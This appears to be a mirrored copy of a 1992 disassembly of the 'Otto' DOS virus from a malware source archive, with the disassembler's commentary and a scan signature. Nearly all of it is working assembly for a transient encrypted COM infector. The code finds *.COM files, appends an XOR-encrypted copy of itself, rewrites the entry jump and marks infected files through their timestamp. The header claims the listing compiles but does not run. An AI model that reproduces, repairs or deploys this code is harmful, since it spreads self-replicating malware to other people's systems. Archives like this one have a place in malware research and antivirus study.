mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-11 21:05:28 +00:00
284 lines
7.4 KiB
NASM
284 lines
7.4 KiB
NASM
|
;******************************************************************************
|
|||
|
; Otto Virus
|
|||
|
;
|
|||
|
; Disassembled by Data Disruptor
|
|||
|
; (c) 1992 RABID International Development
|
|||
|
; (May.12.92)
|
|||
|
;
|
|||
|
; Original virus written by YAM (Youth Against McAfee) 1992
|
|||
|
;
|
|||
|
; Notes: Otto Schtuck (Pardon the spelling?) claims that this is a super-
|
|||
|
; encrypting virus. Well, it took me all of two minutes to get the virus
|
|||
|
; into it's disassembled form. Try again guys. It wasn't half bad. For
|
|||
|
; this virus, I could not use the techniques outlined in my article in
|
|||
|
; Censor Volume 1~, therefore, I had to use another method (which,
|
|||
|
; coincidentally is a lot better). Be expecting "Decrypting Viruses
|
|||
|
; Part ][" in the next issue of Censor (Slated for release in early
|
|||
|
; June).
|
|||
|
;
|
|||
|
; As always, these disassemblies compile but do not run. They are
|
|||
|
; intended to be used for "Hmm. Let's see how that group program's"
|
|||
|
; purposes only.
|
|||
|
;
|
|||
|
; Data Disruptor
|
|||
|
; RABID
|
|||
|
;
|
|||
|
; ~ I don't know the reason why my method outlined in Censor I didn't work.
|
|||
|
; It could have had something to do with SMARTDRV and FSP conflicting in
|
|||
|
; memory. Nonetheless, another method was found.
|
|||
|
;
|
|||
|
; (Ok. So it's not one of my best disassemblies, but at least it shows how
|
|||
|
; one can decrypt encrypted viruses...)
|
|||
|
;
|
|||
|
; A scan for this virus is;
|
|||
|
;
|
|||
|
; # Otto - Written by Otto Schtuck
|
|||
|
; "8A 24 32 E0 88 24 46" Otto Schtuck [Otto] *NEW*
|
|||
|
;
|
|||
|
; It does no damage, does not hide it's file increase, but preserves the time
|
|||
|
; & date stamp. It does not display any message. It is a transient COM infector
|
|||
|
; that will infect one file in the current directory each time it is run.
|
|||
|
;
|
|||
|
;******************************************************************************
|
|||
|
|
|||
|
file_handle equ 9Eh ; File handle location
|
|||
|
enc_bit equ 0FFh ; Encryption bit
|
|||
|
|
|||
|
code segment byte public
|
|||
|
assume cs:code, ds:code
|
|||
|
org 100h
|
|||
|
|
|||
|
;---
|
|||
|
; Length of virus is 379 bytes...
|
|||
|
;---
|
|||
|
|
|||
|
otto_vir proc far
|
|||
|
start:
|
|||
|
jmp short virus_entry ; Virus entry here
|
|||
|
;---
|
|||
|
; This hunk of shit here looks encrypted. I couldn't be bothered to go any
|
|||
|
; further...
|
|||
|
;---
|
|||
|
|
|||
|
crypt_1 db 90h
|
|||
|
db 12h, 44h, 75h, 64h, 6Eh,0C1h
|
|||
|
db 0Eh,0EDh, 70h, 05h, 34h, 5Dh
|
|||
|
db 77h,0EBh, 35h,0D4h, 35h, 46h
|
|||
|
db 34h, 68h, 7Ch,0A2h, 05h,0C1h
|
|||
|
db 24h, 49h, 34h, 4Eh, 6Ch,0F1h
|
|||
|
db 33h,0D5h, 20h, 5Ch, 7Bh, 78h
|
|||
|
db 08h, 88h
|
|||
|
crypt_2 db 69h
|
|||
|
db 0C3h, 79h
|
|||
|
db 08h, 25h, 33h, 3Ch
|
|||
|
db 0B0h, 61h,0F2h, 11h, 6Ah, 5Dh
|
|||
|
db 4Eh, 25h,0CBh, 2Fh,0D4h, 35h
|
|||
|
db 5Ah, 7Ah, 6Bh, 71h,0EBh, 2Eh
|
|||
|
db 0CEh, 31h, 44h, 19h, 00h, 1Fh
|
|||
|
virus_entry:
|
|||
|
cmp al,[bx+di-14h]
|
|||
|
popf ; Pop flags
|
|||
|
or ax,bp
|
|||
|
add [bx+si],al
|
|||
|
pop si
|
|||
|
push si
|
|||
|
sub si,108h
|
|||
|
pop ax
|
|||
|
sub ax,100h
|
|||
|
mov ds:enc_bit,al
|
|||
|
push si
|
|||
|
mov cx,17Bh ; 379 bytes
|
|||
|
add si,offset crypt_2
|
|||
|
|
|||
|
decrypt:
|
|||
|
mov ah,[si]
|
|||
|
xor ah,al
|
|||
|
mov [si],ah
|
|||
|
inc si
|
|||
|
ror al,1 ; Rotate
|
|||
|
loop decrypt
|
|||
|
|
|||
|
pop si
|
|||
|
mov ax,enc_ax[si]
|
|||
|
mov dh,enc_dh[si]
|
|||
|
mov word ptr ds:[100h],ax
|
|||
|
mov crypt_1,dh
|
|||
|
lea dx,filespec ; Set filespec
|
|||
|
xor cx,cx ; Search for normal files
|
|||
|
mov ah,4Eh ; Search for first match
|
|||
|
search_handler:
|
|||
|
int 21h
|
|||
|
jnc got_file
|
|||
|
jmp quit
|
|||
|
;---
|
|||
|
; Otto! If you want to save some bytes, you don't have to open the file in
|
|||
|
; order to get it's time. There are other ways around this...
|
|||
|
;---
|
|||
|
|
|||
|
got_file:
|
|||
|
mov dx,file_handle ; Get file handle from DTA
|
|||
|
mov ax,3D02h ; Open file with read/write
|
|||
|
int 21h
|
|||
|
mov bx,ax ; Save file handle in BX
|
|||
|
mov ax,5700h
|
|||
|
int 21h ; Get time/date from file
|
|||
|
cmp cl,3 ; Check timestamp
|
|||
|
jne found_host ; Not equal to our timestamp?
|
|||
|
mov ah,3Eh ; Then close the file and...
|
|||
|
int 21h ;
|
|||
|
mov ah,4Fh ; ...Search for next match
|
|||
|
jmp short search_handler
|
|||
|
found_host:
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
call move_ptr_start ; Move file pointer to start
|
|||
|
lea dx,[si+three_bytes] ; Set buffer space for 3 bytes
|
|||
|
mov cx,3 ; Set for 3 bytes
|
|||
|
mov ah,3Fh ; Read in file
|
|||
|
int 21h
|
|||
|
xor cx,cx ; Set registers to...
|
|||
|
xor dx,dx ; ...absolute end of file
|
|||
|
mov ax,4202h
|
|||
|
int 21h ; Move file point to end
|
|||
|
mov word ptr ptr_loc[si],ax
|
|||
|
sub ax,3
|
|||
|
mov adj_ptr_loc[si],ax
|
|||
|
call move_ptr_start
|
|||
|
add ax,6
|
|||
|
mov work[si],al
|
|||
|
mov cx,word ptr ptr_loc[si]
|
|||
|
;---
|
|||
|
; Set buffer space at end of the file so that we don't waste space in the
|
|||
|
; virus
|
|||
|
;---
|
|||
|
lea dx,[si+2A4h]
|
|||
|
mov ah,3Fh ; Read in file
|
|||
|
int 21h
|
|||
|
push si
|
|||
|
mov al,work[si]
|
|||
|
add si,offset copyright+4
|
|||
|
call encrypt
|
|||
|
pop si
|
|||
|
call move_ptr_start
|
|||
|
mov cx,word ptr ptr_loc[si]
|
|||
|
lea dx,[si+2A4h] ; Load effective addr
|
|||
|
mov ah,40h ;
|
|||
|
int 21h
|
|||
|
jnc check_write ;
|
|||
|
jmp short quit
|
|||
|
check_write:
|
|||
|
lea dx,[si+105h] ; Load effective addr
|
|||
|
mov cx,24h
|
|||
|
mov ah,40h ;
|
|||
|
int 21h
|
|||
|
push si
|
|||
|
mov cx,17Bh ; 379 bytes
|
|||
|
mov di,si
|
|||
|
add di,offset copyright+1
|
|||
|
add si,offset crypt_2
|
|||
|
rep movsb ;
|
|||
|
pop si
|
|||
|
push si
|
|||
|
mov al,work[si]
|
|||
|
mov cx,17Bh ; 397 bytes
|
|||
|
add si,offset copyright+1
|
|||
|
call encrypt
|
|||
|
pop si
|
|||
|
mov cx,17Bh ; 397 bytes
|
|||
|
lea dx,[si+2A4h] ; Set buffer to encrypted data
|
|||
|
mov ah,40h ; Write out the virus to the
|
|||
|
; file
|
|||
|
int 21h
|
|||
|
jc quit ; Jump if carry Set
|
|||
|
call move_ptr_start ; Move file pointer to start
|
|||
|
lea dx,[si+new_jump] ; Load DX with the new jump
|
|||
|
mov ah,40h ;
|
|||
|
mov cx,3 ; Set for 3 bytes
|
|||
|
int 21h ; Write out the new jump
|
|||
|
jc quit ; Jump if carry Set
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
mov cl,3 ; Set low order time with
|
|||
|
; our identity byte
|
|||
|
mov ax,5701h
|
|||
|
int 21h ; Set file date/time
|
|||
|
mov ah,3Eh ;
|
|||
|
int 21h ; Close the file
|
|||
|
|
|||
|
;---
|
|||
|
; Hmm. This routine looks a bit familiar... Maybe it was "borrowed" from the
|
|||
|
; RAGE Virus we wrote...
|
|||
|
;---
|
|||
|
|
|||
|
quit:
|
|||
|
push si ; Save our SI
|
|||
|
mov al,ds:enc_bit ; Load AL with value of the
|
|||
|
; encryption bit
|
|||
|
xor cx,cx ;
|
|||
|
add cx,si ; Load CX with original 3 bytes
|
|||
|
add cx,3 ; Adjust value for offset of
|
|||
|
; virgin code
|
|||
|
mov bp,103h ; Load BP with offset of 103h
|
|||
|
; Where the virgin code starts
|
|||
|
mov si,bp ; Copy this location to SI
|
|||
|
call encrypt ; Encrypt this portion of the
|
|||
|
; code
|
|||
|
pop si ; Restore original SI
|
|||
|
mov bp,offset start ; Load BP with offset of start
|
|||
|
; of the virgin code
|
|||
|
jmp bp ; Jump to start of virgin code
|
|||
|
otto_vir endp
|
|||
|
|
|||
|
encrypt proc near
|
|||
|
encryption:
|
|||
|
mov ah,[si]
|
|||
|
xor ah,al
|
|||
|
mov [si],ah
|
|||
|
inc si
|
|||
|
ror al,1 ; Rotate
|
|||
|
loop encryption
|
|||
|
|
|||
|
retn
|
|||
|
encrypt endp
|
|||
|
|
|||
|
db 'OTTO VIRUS written by:OTTO '
|
|||
|
enc_ax dw 4353h ; Encryption shit loaded in AX
|
|||
|
enc_dh db 48h ; Encryption shit loaded in DH
|
|||
|
db 54h
|
|||
|
adj_ptr_loc dw 4355h ; Adjusted file pointer
|
|||
|
; location (ptr_loc-3 bytes)
|
|||
|
work db 4Bh ; A work buffer
|
|||
|
ptr_loc db 20h ; File pointer location
|
|||
|
copyright db 'COPYRIGHT MICROSHAFT INDUSTRIES '
|
|||
|
db '1992 (tm.)PQR'
|
|||
|
;---
|
|||
|
; Everything below here appeared as a bunch of hex shit I had to convert...
|
|||
|
;---
|
|||
|
|
|||
|
move_ptr_start proc near
|
|||
|
mov ax,4200h ; Move fp to start (B80042)
|
|||
|
xor cx,cx ; (33C9)
|
|||
|
xor dx,dx ; (33D2)
|
|||
|
int 21h ; Call DOS (CD21)
|
|||
|
pop dx ; (5A)
|
|||
|
pop cx ; (59)
|
|||
|
pop ax ; (58)
|
|||
|
ret ; (C3)
|
|||
|
move_ptr_start endp
|
|||
|
|
|||
|
filespec db '*.COM',0 ; Location 295h
|
|||
|
|
|||
|
three_bytes db 0ebh,46h,90h ; jmp 148 (Location 29Bh)
|
|||
|
new_jump db 0e9h,4ah,00h ; jmp 150 (Loc 29Eh)
|
|||
|
push ax ; Loc 2A1h
|
|||
|
dec bp ; Loc 2A2h
|
|||
|
db 00h ; Loc 2A3h
|
|||
|
|
|||
|
code ends
|
|||
|
|
|||
|
|
|||
|
|
|||
|
end start
|
|||
|
|
|||
|
|
|||
|
|